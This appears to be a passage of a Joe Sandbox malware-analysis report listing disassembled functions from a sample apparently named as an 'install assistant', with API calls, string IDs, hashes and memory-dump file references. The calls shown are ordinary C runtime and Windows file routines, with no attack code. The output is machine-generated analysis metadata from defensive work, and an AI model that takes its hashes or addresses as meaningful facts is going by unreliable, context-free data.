                                                            • Part of subcall function 6C697327: __EH_prolog3.LIBCMT ref: 6C69732E
                                                            • Part of subcall function 6C697327: std::_Lockit::_Lockit.LIBCPMT ref: 6C697339
                                                            • Part of subcall function 6C697327: std::locale::_Setgloballocale.LIBCPMT ref: 6C697354
                                                            • Part of subcall function 6C697327: _Yarn.LIBCPMT ref: 6C69736A
                                                            • Part of subcall function 6C697327: std::_Lockit::~_Lockit.LIBCPMT ref: 6C6973A7
                                                            • Part of subcall function 6C562F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C562F95
                                                            • Part of subcall function 6C562F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C562FAF
                                                            • Part of subcall function 6C562F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C562FD0
                                                            • Part of subcall function 6C562F60: __Getctype.LIBCPMT ref: 6C563084
                                                            • Part of subcall function 6C562F60: std::_Facet_Register.LIBCPMT ref: 6C56309C
                                                            • Part of subcall function 6C562F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C5630B7
                                                          • std::ios_base::_Addstd.LIBCPMT ref: 6C56211B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                          • API String ID: 3332196525-1866435925
                                                          • Opcode ID: 4d0464543d303444dee1f99325a0791093883f2025a7aef3a20708f442be23dd
                                                          • Instruction ID: fdcc39b1639c9ce0ce53cc6f06d595508ddb49a8aeb581b35b22935db6773a37
                                                          • Opcode Fuzzy Hash: 4d0464543d303444dee1f99325a0791093883f2025a7aef3a20708f442be23dd
                                                          • Instruction Fuzzy Hash: 6041B1B0E003098FDB00CF65CC457AABBB1FF45318F148268E919ABB91D7759985CB95
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C6F4ECC
                                                            • Part of subcall function 6C6DF58A: __EH_prolog.LIBCMT ref: 6C6DF58F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: :hJ$dJ$xJ
                                                          • API String ID: 3519838083-2437443688
                                                          • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                                          • Instruction ID: 4df33ee6ff922de1498205bfd480244bd17e5ef128f086a81ccddb8e42044956
                                                          • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                                          • Instruction Fuzzy Hash: 2921DCB0915B50CFC760CF6AC15428ABBF4FF2A704B40C95EC0AA97B11D7B8A508CF59
                                                          APIs
                                                          • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C6AB0D0,6C561DEA,00008000,6C6AB0D0,?,?,?,6C6AAC7F,6C6AB0D0,?,00000000,6C561DEA), ref: 6C6AADC9
                                                          • GetLastError.KERNEL32(?,?,?,6C6AAC7F,6C6AB0D0,?,00000000,6C561DEA,?,6C6B469E,6C6AB0D0,000000FF,000000FF,00000002,00008000,6C6AB0D0), ref: 6C6AADD3
                                                          • __dosmaperr.LIBCMT ref: 6C6AADDA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastPointer__dosmaperr
                                                          • String ID: 8Q
                                                          • API String ID: 2336955059-4022487301
                                                          • Opcode ID: bd9cee428c45ff64d722832627ef56bffa4089e79f30e26efce5cf636ba34348
                                                          • Instruction ID: a2853149bf99ab9c95b56ccf43a90773e5cc241692070e97624840d4fad4f045
                                                          • Opcode Fuzzy Hash: bd9cee428c45ff64d722832627ef56bffa4089e79f30e26efce5cf636ba34348
                                                          • Instruction Fuzzy Hash: 4A01D8337145157FCF059FAACC458EE3B79EB86325B250309F85197681EA71DD028BA8
                                                          APIs
                                                          • AcquireSRWLockExclusive.KERNEL32(6C79466C,?,652EF5AA,6C56230E,6C79430C), ref: 6C696B07
                                                          • ReleaseSRWLockExclusive.KERNEL32(6C79466C), ref: 6C696B3A
                                                          • WakeAllConditionVariable.KERNEL32(6C794668), ref: 6C696B45
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                          • String ID: lFyl
                                                          • API String ID: 1466638765-2656733465
                                                          • Opcode ID: 92db779d184df0abd57070ca4812c268c00c719a534d14c05602434413b17ffd
                                                          • Instruction ID: 4b5b9883866423f2a794b55e3cae0d95d81b764291d626bceb693e91c82c242b
                                                          • Opcode Fuzzy Hash: 92db779d184df0abd57070ca4812c268c00c719a534d14c05602434413b17ffd
                                                          • Instruction Fuzzy Hash: 8BF030B8601900DFCB05EF99E888D747BB4FB4A351B024079F91987700C7706902CF64
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,6C69EF64,6C6C6DD8,0000000C), ref: 6C6A49B7
                                                          • _free.LIBCMT ref: 6C6A4A14
                                                          • _free.LIBCMT ref: 6C6A4A4A
                                                          • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6C69EF64,6C6C6DD8,0000000C), ref: 6C6A4A55
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast_free
                                                          • String ID:
                                                          • API String ID: 2283115069-0
                                                          • Opcode ID: 4fa11f7b636d2a5e4e23d1009edc189b5a5fb8db0e5de4e16c6ffbd5f2fa2bcb
                                                          • Instruction ID: c89c54eb16b4885867abb651a3917334a32331f69691ef4bbb525ea465b17ed5
                                                          • Opcode Fuzzy Hash: 4fa11f7b636d2a5e4e23d1009edc189b5a5fb8db0e5de4e16c6ffbd5f2fa2bcb
                                                          • Instruction Fuzzy Hash: C2117336304200AB9A015DF95C84EBA36A99BC377DB251639F62996BC0DFB1CC1B412C
                                                          APIs
                                                          • WriteConsoleW.KERNEL32(00000000,?,6C6B46EC,00000000,00000000,?,6C6B4B51,00000000,00000001,00000000,6C6AB0D0,?,6C6AC286,?,?,6C6AB0D0), ref: 6C6B5ED1
                                                          • GetLastError.KERNEL32(?,6C6B4B51,00000000,00000001,00000000,6C6AB0D0,?,6C6AC286,?,?,6C6AB0D0,?,6C6AB0D0,?,6C6ABD1C,6C6B5AB6), ref: 6C6B5EDD
                                                            • Part of subcall function 6C6B5F2E: CloseHandle.KERNEL32(FFFFFFFE,6C6B5EED,?,6C6B4B51,00000000,00000001,00000000,6C6AB0D0,?,6C6AC286,?,?,6C6AB0D0,?,6C6AB0D0), ref: 6C6B5F3E
                                                          • ___initconout.LIBCMT ref: 6C6B5EED
                                                            • Part of subcall function 6C6B5F0F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C6B5EAB,6C6B4B3E,6C6AB0D0,?,6C6AC286,?,?,6C6AB0D0,?), ref: 6C6B5F22
                                                          • WriteConsoleW.KERNEL32(00000000,?,6C6B46EC,00000000,?,6C6B4B51,00000000,00000001,00000000,6C6AB0D0,?,6C6AC286,?,?,6C6AB0D0,?), ref: 6C6B5F02
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                          • String ID:
                                                          • API String ID: 2744216297-0
                                                          • Opcode ID: a6f447e3d944614cf12be78d9f7656acc8448a10c7ea0eab2c01e8aa7189e438
                                                          • Instruction ID: 0c58b6053e02af3718e16f5de62485e058bc5e90b8d27774a74f8845fb2dcaba
                                                          • Opcode Fuzzy Hash: a6f447e3d944614cf12be78d9f7656acc8448a10c7ea0eab2c01e8aa7189e438
                                                          • Instruction Fuzzy Hash: FCF03036600115BBCF125FA2DC049E97F7AFB0A7A1F084011FA1996220CB728D30DF98
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog3_
                                                          • String ID: 8Q
                                                          • API String ID: 2427045233-4022487301
                                                          • Opcode ID: 9bd3a5aa47515743a5a95efc570f42591a1123d6c255a3d7d1b5aec74f9fc02a
                                                          • Instruction ID: 3f037684cb3a5344df13a31e462336d806a2dae9fb6b0bace0eff6e36930b89e
                                                          • Opcode Fuzzy Hash: 9bd3a5aa47515743a5a95efc570f42591a1123d6c255a3d7d1b5aec74f9fc02a
                                                          • Instruction Fuzzy Hash: F8719371D092969FDB108FD5C880AFE7AB5AF46318F144239EA20A7A40DF75DC47CB68
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C6E8C5D
                                                            • Part of subcall function 6C6E761A: __EH_prolog.LIBCMT ref: 6C6E761F
                                                            • Part of subcall function 6C6E7A2E: __EH_prolog.LIBCMT ref: 6C6E7A33
                                                            • Part of subcall function 6C6E8EA5: __EH_prolog.LIBCMT ref: 6C6E8EAA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: WZJ
                                                          • API String ID: 3519838083-1089469559
                                                          • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                                          • Instruction ID: 0bf448975b53d8355274ad8bc2c743e7424eab87cbb48c136582bb4a76949c8c
                                                          • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                                          • Instruction Fuzzy Hash: ED817B31D05158DFCF15DFA8D994ADDB7B5AF0A318F10409AE412777A0DB30AE09CB69
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: CK$CK
                                                          • API String ID: 3519838083-2096518401
                                                          • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                                                          • Instruction ID: b5a539e41bb368514e8141814d2837a19f9f411acda4fb382ab14b1d20e7dd0a
                                                          • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                                                          • Instruction Fuzzy Hash: 0D519175A04305DFDB00DFA5C9C4BEEB3B5FF88358F188529D901EBA45DB74AA058BA0
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6AA739
                                                          • ReadFile.KERNEL32(?,?,00001000,?,00000000,6C6AAB2D,00000000,00000000,00000000,?,?,6C6974B7,00000000), ref: 6C6AA7B9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: Dt*%
                                                          • API String ID: 1834446548-1118161045
                                                          • Opcode ID: 82b14872fd8eb288297e32893e5d1a3450be3aba58986b5c1f1327db266cb3d7
                                                          • Instruction ID: fbc82c7e237e28e1921d9a16215b65b087066c589ceb821ed456d48f3e278142
                                                          • Opcode Fuzzy Hash: 82b14872fd8eb288297e32893e5d1a3450be3aba58986b5c1f1327db266cb3d7
                                                          • Instruction Fuzzy Hash: 6E410531B00154ABDB19CFA8CC80BE9B7B5EB49308F5482EAE54997642D770DD87CF98
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C6B46D6), ref: 6C6AD01B
                                                          • __dosmaperr.LIBCMT ref: 6C6AD022
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr
                                                          • String ID: 8Q
                                                          • API String ID: 1659562826-4022487301
                                                          • Opcode ID: 57d14b3ac652e6b9980d601ff2a393a910b0ed084951c327b93e3edff642e162
                                                          • Instruction ID: 97ca983ff8637800fd5d583892cea087deb84842a759d22b07bc1a8d35fc59f1
                                                          • Opcode Fuzzy Hash: 57d14b3ac652e6b9980d601ff2a393a910b0ed084951c327b93e3edff642e162
                                                          • Instruction Fuzzy Hash: 4B417771604194BFDB11DFA9C880AE97FA5EF4B318F248259E8828B641D3729D17C798
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: Dt*%
                                                          • API String ID: 269201875-1118161045
                                                          • Opcode ID: e9f3edce932101b75df6f02f2842653ecf22de4933595721fe5c328bb19028ef
                                                          • Instruction ID: e246eaa263bb87fe6429ec67384109491689f6c06da13ed310bf800c6736403b
                                                          • Opcode Fuzzy Hash: e9f3edce932101b75df6f02f2842653ecf22de4933595721fe5c328bb19028ef
                                                          • Instruction Fuzzy Hash: 9341B636A012019FCB10CFB8C880A9DB7F5EF89718B264569E515EF751EB31ED06CB85
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: U#Vl$q!Vl
                                                          • API String ID: 4218353326-3769553861
                                                          • Opcode ID: b3fdb5d119841f6e64e781221bc1ec6a4ae4fe2c9920c8f93be868603f11b821
                                                          • Instruction ID: 0a74ae9c525eb8989674cb271d474400401267ce266cfa4fa2563a9a4aebd4cc
                                                          • Opcode Fuzzy Hash: b3fdb5d119841f6e64e781221bc1ec6a4ae4fe2c9920c8f93be868603f11b821
                                                          • Instruction Fuzzy Hash: E741D5B2C003199BDB10DFA5DC84BDEBBB5EF59324F140125E809A7B50E7319948CBE5
                                                          APIs
                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,6C6ABD83,6C6B5AB6,6C6AB0D0,?,6C6B46EC,?,00000000,00000000,6C6B5AB6,00000000,00000000), ref: 6C6AC570
                                                          • GetLastError.KERNEL32(6C6ABD83,6C6B5AB6,6C6AB0D0,?,6C6B46EC,?,00000000,00000000,6C6B5AB6,00000000,00000000,?,00000000,6C6AB0D0,6C6B46EC,00000000), ref: 6C6AC5A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: Dt*%
                                                          • API String ID: 442123175-1118161045
                                                          • Opcode ID: 27da6e86933b16507a6cd90cd3690b9c7a6f52d6112653b33b285d75d797da73
                                                          • Instruction ID: cd5c6a50a89060bfec9c83381d37fb410d1ff044e676cc3116124c6467b0313f
                                                          • Opcode Fuzzy Hash: 27da6e86933b16507a6cd90cd3690b9c7a6f52d6112653b33b285d75d797da73
                                                          • Instruction Fuzzy Hash: 9031E671B00219AFDB18DF69CC81BEE77B5EF48304F1440A9E506D7690DB71EE818B64
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: 0|J$`)L
                                                          • API String ID: 3519838083-117937767
                                                          • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                                          • Instruction ID: a3fb0d07b3e6dfe4fd5862c57ec359651d78be2f1ca7a51aecac31b3356078a1
                                                          • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                                          • Instruction Fuzzy Hash: 7641C271301741EFCB119F60C590BEABBE2FF56208F00442EE56A97B50CB716904DB9A
                                                          APIs
                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,6C6AB0D0,?,?,6C6ABD73,6C6B5AB6,6C6AB0D0,?,6C6B46EC,?,00000000), ref: 6C6AC448
                                                          • GetLastError.KERNEL32(?,6C6ABD73,6C6B5AB6,6C6AB0D0,?,6C6B46EC,?,00000000,00000000,6C6B5AB6,00000000,00000000,?,00000000,6C6AB0D0,6C6B46EC), ref: 6C6AC46E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: Dt*%
                                                          • API String ID: 442123175-1118161045
                                                          • Opcode ID: 44d56f423b9f7276dbf6d2966011bdbe60e102b237ec606672c62fbaaa7ec0bc
                                                          • Instruction ID: a7cdccaeadc6f1b59d49b73132c1c3483b08387d27263e2895924d58f9760214
                                                          • Opcode Fuzzy Hash: 44d56f423b9f7276dbf6d2966011bdbe60e102b237ec606672c62fbaaa7ec0bc
                                                          • Instruction Fuzzy Hash: D8219131A00219AFCB24DF59CC809EEB3B5FF49314F1445AAE90AD7250D7319E86CBA9
                                                          APIs
                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,6C6AB0D0,?,?,6C6ABD93,6C6B5AB6,6C6AB0D0,?,6C6B46EC,?,00000000), ref: 6C6AC35F
